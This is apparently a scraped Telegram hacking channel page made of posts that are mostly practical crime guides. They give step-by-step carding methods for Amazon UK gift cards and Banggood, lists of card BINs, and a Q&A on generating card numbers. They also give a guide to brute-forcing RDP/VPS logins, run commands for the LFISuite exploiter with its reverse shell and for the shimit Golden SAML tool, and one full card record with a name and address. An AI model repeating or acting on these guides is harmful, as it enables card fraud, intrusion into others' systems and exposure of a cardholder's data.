UNDERCODE COMMUNITY
2.69K subscribers
1.23K photos
31 videos
2.65K files
80.4K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
πŸ¦‘ if i don t get screanshoats no public carding free next time
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘wikileak -high balance Visa bins
444796
412453
435619
488893
488890
487309
446540
489262
400344
414718
426429
430550
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Amazong UK EGift Cards last Tutorial
t.me/undercodeTesting

1) Put on UK VPN or SOCK5

2) Clear all cookies with ccleaner or any good software
Get UK cc (Visa works best)

3) Go to hotmail.com then create email with name of cc ( If cc name is John Smith, make [You must be registered and logged in to see this link.] or similar)

4) Go to amazon.co.uk and click gift card then select print now

5) Pick a design and amount as 10 Pounds (Recommended)

6) Put the name you are sending to with same last name as cc ( If cc name John Smith send to Jake Smith or similar)

7) Click add to order then carry on and create new account with email

8) Fill in all details then make order

9) In 5-7 minutes you will have your GC

10) Then you can do again and again with same CC but always do 10 Pounds because its guaranteed to work if CC has balance

11) From each good CC you should get 70 Pounds

12) When CC stop working clear cookies change IP and do again

13) You can add as many GC as you want to one Amazon acc.

14) That's it ! Enjoy .

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁


πŸ¦‘Get a FREE .design domain :

> Go to porkbun.com

> Search for any .design domain

πŸ¦‘ Apply promocode :
WDHUT
or
GOOG19A

> NOTE(if above given coupon code doesn't work, visit this website
If u r lucky, you will get coupon code applied automatically)

πŸ¦‘BIN : 5454860xxxxxxxxx

IP : Any

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘let s send now some CARDING tutorials g from popular deepwebsites, ALL CARDERS THEIR XD
πŸ¦‘ USE FOR LEARN NOT FOR STEAL !πŸ˜±πŸ˜‚
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ How To Card Banggood.com Tutorial


πŸ¦‘ REQUIRMENTS

β€’ Socks 5 proxy
β€’ Live cc
β€’ RDP

πŸ¦‘ Method To Card Banggood
β€’ Open Firefox

β€’ Create a gmail or yahoo same as cc address name

β€’ Clear history and cache using cc cleaner of browser

β€’ Connect your socks 5 ( SOCKS 5 should not be blacklisted and not public)

β€’ Go to https://banggood.com create account add billing of cc owner and keep name as cc owner

β€’ Then add product below 40k keep it in card for 30min

β€’ Check to proceed remember seller contact number and email address please read( CUSTOM CLEARANCE BEFORE ORDERING)

β€’ After your order is done you will get email regarding your order

β€’ Don’t think now you should disconnect all tools

β€’ Keep your pc 4 hours with hma or any vpn you used duing card and socks 5 connected

β€’ And be seeing that your pc doesn’t go to sleep keep it alive till 4 hours

β€’ After 4 hours open firefox check order see weather it live or cancelled

β€’ Chill if your order is live logout from your banggood account off all tools clear data

β€’ Then again after 14 hours connect your vpn login login into banggood see weather your order is been shipped or not if shipped follow next part??

πŸ¦‘ What Bin is Best for Banggood ??

I would or anyone will recommended You Non vbv Fullz LISTED BELOW

πŸ¦‘ USA CLASSIC

489765, 486791, 485178, 483347, 482500, 482070, 482052, 482028, 482024, 481996, 480684, 480659, 480392, 478864, 475800, 473549, 473489

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ“HOW TO SET A PASSWORD FOLDERπŸ“

1) Select the file or folder you want to encrypt.

2) Right-click the file or folder and select Properties.

3)On the General tab, click the Advanced button.

4) Check the box for the "Encrypt contents to secure data" option.

5) Click Apply and then OK.

Note: If the "Encrypt contents to secure data" option is not selectable and grayed out or you do not see the option at all, you likely have a Home edition of Windows, which does not support this feature. It is also possible that the hard drive where the files are located is not formatted as NTFS, as this is a requirement for the encryption feature.

written by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘carding QUESTIONS -small tips:

Q: What is a bin?
A: A bank identification number (BIN) is the initial four to six numbers that appear on a credit card. Finding a good BIN can affect your carding.

Q: How do I use a bin?
A: Simply go to a CC(=CreditCard) generator and paste your bin there to generate a CC. The format will be like this:
CreditCard | Exp. Month | Exp. Year | CVV

Q: What is a CVV?
A: CVV stands for Card Verification Value. CVV numbers are also known as CSC numbers (Card Security Code). A CVV is like an extra layer of security.

Q: How do I fill in the CC?
A: After creating a CC, you have to use a VPN to tunnel to the specefic location. After that, go to the relevant site where you want to get a free trial. Write a bullshit cardholder name in. Type the CC manually in (so do not copy paste it!). Fill the other details such as CVV and the expiry date manually in.

Q: Can I use bins on every site?
A: No. Sites like Netflix are very hard. You will need a private bin to fix a trial there.

written by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ A tool that implements the Golden SAML attack
> shimit allows the user to create a signed SAMLResponse object, and use it to open a session in the Service Provider. shimit now supports AWS Console as a Service Provider
> After generating and signing the SAMLResponse's assertion, shimit will call the AssumeRoleWithSAML() API in AWS. Then, the session token and key will be applied to a new session, where the user can use aws cli to perform action using the permissions obtained using the golden SAML.
pinterest.com/undercode_Testing

πŸ¦‘ π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

1) python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml

2) git clone https://github.com/cyberark/shimit

3) python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

4) idp - Identity Provider URL e.g. http://server.domain.com/adfs/services/trust

pk - Private key file full path (pem format)

c - Certificate file full path (pem format)

u - User and domain name e.g. domain\username (use \ or quotes in *nix)

n - Session name in AWS

r - Desired roles in AWS. Supports Multiple roles, the first one specified will be assumed.

id - AWS account id e.g. 123456789012

5) Save SAMLResponse to file
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 -o saml_response.xml
o - Output encoded SAMLResponse to a specified file path

6) Load SAMLResponse from file
python .\shimit.py -l saml_response.xml

πŸ¦‘tested by undercode

> TERMUX-LINUX

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner
> termux root -linux -windows-osx
t.me/undercodeTesting

πŸ¦‘FEATURES :

Works with Windows, Linux and OS X

Automatic Configuration

Automatic Update

Provides 8 different Local File Inclusion attack modalities:

/proc/self/environ
php://filter
php://input
/proc/self/fd
access log
phpinfo
data://
expect://

Provides a ninth modality, called Auto-Hack, which scans and exploits the target automatically by trying all the attacks one after the other without you having to do anything (except for providing, at the beginning, a list of paths to scan, which if you don't have you can find in this project directory in two versions, small and huge).

Tor proxy support

Reverse Shell for Windows, Linux and OS X

πŸ¦‘ π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

1) git clone https://github.com/D35m0nd142/LFISuite

2) cd LFISuite

3) run python socks for linux and the script or run .exe for windows

4) When you got a LFI shell by using one of the available attacks, you can easily obtain a reverse shell by entering the command "reverseshell" (obviously you must put your system listening for the reverse connection, for instance using "nc -lvp port").

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘top carding How to Crack a VPS/RDP ( GET FREE RDP'S ) :

Hello, today we'll be learning how to crack ez VPS/RDP's (Remote Desktop Connection). Follow each step and get yourself free RDP's instead of paying
fb.com/undercodeTesting

πŸ¦‘ Tools Needed:
Kport SCANNER

( Download :
https://anonfile.com/w699R4w9bd/KPortScan_3.0_rar

DUBrute
(Download: https://dailyuploads.net/mgvxio5yssx6 )
IP adress list

https://www.countryipblocks.net/acl.php
––––––––––
πŸ¦‘ STEPS:
1] Download DUBrute & KPORT SCANNER from above links and install them

2] Go here
https://www.countryipblocks.net/country_selection.php

And copy all ip address & paste in kport scan. After clicking start button don't change anything

3] Find some ips in count of goods. They will automatically be saved in results.

4] Now open DUBrute
- Click on Generation, another window will open.
Now this step is pretty self explanatory, You must load each of the .txt files in its field.
- For IP click on File IP and browse to the results.txt file you saved in kport scan folder.
- For Login click on File Login and browse to the DUBrute Folder.
You'll find a .txt file named Login. Select that file. For Password click on File Pass and again browse to the DUBrute Folder.
You'll find a .txt file named Ε“Pass. That is the file you need.

5] When you get some Good Ip's, it's time to connect to the VPS/RDP.The working IP's are stored in a .txt file named Ε“Good in the DUBrute folder.
They are in the format 111.222.333.444@username:password.
––––––––––
Now you have your FREE VPS/RDP, Enjoy

@undercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘2020 updated GEnerate a custom wordlist-bruteforce with more speed and sucess :
t.me/undercodeTesting

πŸ¦‘ π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :


1) git clone https://github.com/digininja/CeWL

2) cd CeWL

3) ./cew.rb

CeWL 5.4.2 (Break Out) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
Usage: cewl [OPTIONS] ... <url>

OPTIONS:
-h, --help: Show help.
-k, --keep: Keep the downloaded file.
-d <x>,--depth <x>: Depth to spider to, default 2.
-m, --min_word_length: Minimum word length, default 3.
-o, --offsite: Let the spider visit other sites.
-w, --write: Write the output to the file.
-u, --ua <agent>: User agent to send.
-n, --no-words: Don't output the wordlist.
-a, --meta: include meta data.
--meta_file file: Output file for meta data.
-e, --email: Include email addresses.
--email_file <file>: Output file for email addresses.
--meta-temp-dir <dir>: The temporary directory used by exiftool when parsing files, default /tmp.
-c, --count: Show the count for each word found.
-v, --verbose: Verbose.
--debug: Extra debug information.

Authentication
--auth_type: Digest or basic.
--auth_user: Authentication username.
--auth_pass: Authentication password.

Proxy Support
--proxy_host: Proxy host.
--proxy_port: Proxy port, default 8080.
--proxy_username: Username for proxy, if required.
--proxy_password: Password for proxy, if required.

Headers
--header, -H: In format name:value - can pass multiple.

<url>: The site to spider.

πŸ¦‘Running CeWL in a Docker container
To quickly use CeWL on your machine with Docker, you have to build it :

1) Build the container :
docker build -t cewl .

2) Container usage without interacting with local files :
docker run -it --rm cewl [OPTIONS] ... <url>

3) Container usage with local files as input or output :
# you have to mount the current directory when calling the container
docker run -it --rm -v "${PWD}:/host" cewl [OPTIONS] ... <url>

@undercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ USE FOR LEARN NOT FOR STEAL
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ¦‘ 5258952501098909 10/21 307 Sehaki Kamal ADDRESS Vancouver BC J8T 3T8 CANADA


Use any vpn
Location Canada
Make Amazon prime
Enjoy
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM